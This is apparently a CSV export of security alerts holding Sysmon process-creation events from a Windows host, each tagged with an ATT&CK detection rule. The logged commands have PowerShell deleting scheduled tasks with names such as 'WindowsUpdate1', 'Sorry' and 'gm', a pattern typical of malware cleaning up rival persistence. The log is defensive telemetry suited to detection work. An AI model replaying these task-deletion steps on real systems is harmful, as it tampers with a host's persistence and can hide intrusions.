\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.248"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00105edd2e00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.375",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.199 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010bcdb2e00} +ProcessId: 6872 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.202710000Z"",""eventRecordID"":""3549"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.199\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010bcdb2e00}\r\nProcessId: 6872\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.199"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010bcdb2e00}"",""processId"":""6872"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.358",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.174 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001025da2e00} +ProcessId: 4972 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.177884400Z"",""eventRecordID"":""3548"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.174\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001025da2e00}\r\nProcessId: 4972\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.174"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001025da2e00}"",""processId"":""4972"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.355",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.130 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105cd82e00} +ProcessId: 7992 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.132697500Z"",""eventRecordID"":""3547"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.130\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105cd82e00}\r\nProcessId: 7992\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.130"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00105cd82e00}"",""processId"":""7992"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.316",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.094 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001015d62e00} +ProcessId: 748 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.098627200Z"",""eventRecordID"":""3546"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.094\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001015d62e00}\r\nProcessId: 748\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.094"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001015d62e00}"",""processId"":""748"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.299",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.050 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001078d22e00} +ProcessId: 2492 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.052844200Z"",""eventRecordID"":""3545"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.050\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001078d22e00}\r\nProcessId: 2492\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.050"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001078d22e00}"",""processId"":""2492"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.287",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.994 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ccf2e00} +ProcessId: 5952 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.997405700Z"",""eventRecordID"":""3544"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.994\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ccf2e00}\r\nProcessId: 5952\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.994"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-00105ccf2e00}"",""processId"":""5952"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm 